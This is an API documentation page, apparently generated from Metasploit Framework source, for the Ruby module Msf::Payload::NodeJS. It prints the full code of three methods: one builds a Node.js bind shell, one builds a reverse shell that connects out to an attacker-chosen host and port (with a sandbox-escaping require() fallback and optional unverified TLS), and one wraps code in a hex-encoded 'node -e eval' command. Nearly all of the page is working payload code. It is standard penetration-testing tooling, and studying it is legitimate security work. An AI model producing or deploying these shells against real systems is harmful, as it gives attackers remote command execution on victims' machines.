Module: Msf::Payload::NodeJS

Defined in:
lib/msf/core/payload/nodejs.rb

Instance Method Summary collapse

Instance Method Details

#nodejs_bind_tcpString

Outputs a javascript snippet that spawns a bind TCP shell


7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
# File 'lib/msf/core/payload/nodejs.rb', line 7

def nodejs_bind_tcp
  cmd = "(function(){\nvar require = global.require || global.process.mainModule.constructor._load;\nif (!require) return;\n\nvar cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\";\nvar net = require(\"net\"),\ncp = require(\"child_process\"),\nutil = require(\"util\");\n\nvar server = net.createServer(function(socket) {\nvar sh = cp.spawn(cmd, []);\nsocket.pipe(sh.stdin);\nutil.pump(sh.stdout, socket);\nutil.pump(sh.stderr, socket);\n});\nserver.listen(\#{datastore['LPORT']});\n})();\n"
  cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end

#nodejs_cmd(code) ⇒ String

Wraps the javascript code param in a “node” command invocation


67
68
69
# File 'lib/msf/core/payload/nodejs.rb', line 67

def nodejs_cmd(code)
  "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
end

#nodejs_reverse_tcp(opts = {}) ⇒ String

Outputs a javascript snippet that spawns a reverse TCP shell

Options Hash (opts):

  • :use_ssl (Boolean)

    use SSL when communicating with the shell. defaults to false.


34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# File 'lib/msf/core/payload/nodejs.rb', line 34

def nodejs_reverse_tcp(opts={})
  use_ssl = opts.fetch(:use_ssl, false)
  tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
  net_lib = if use_ssl then 'tls' else 'net' end
  lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
  # the global.process.mainModule.constructor._load fallback for require() is
  # handy when the payload is eval()'d into a sandboxed context: the reference
  # to 'require' is missing, but can be looked up from the 'global' object.
  #
  # however, this fallback might break in later versions of nodejs.
  cmd = "(function(){\nvar require = global.require || global.process.mainModule.constructor._load;\nif (!require) return;\nvar cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\";\nvar net = require(\"\#{net_lib}\"),\ncp = require(\"child_process\"),\nutil = require(\"util\"),\nsh = cp.spawn(cmd, []);\nvar client = this;\nclient.socket = net.connect(\#{datastore['LPORT']}, \"\#{lhost}\", \#{tls_hash} function() {\nclient.socket.pipe(sh.stdin);\nutil.pump(sh.stdout, client.socket);\nutil.pump(sh.stderr, client.socket);\n});\n})();\n"
  cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
end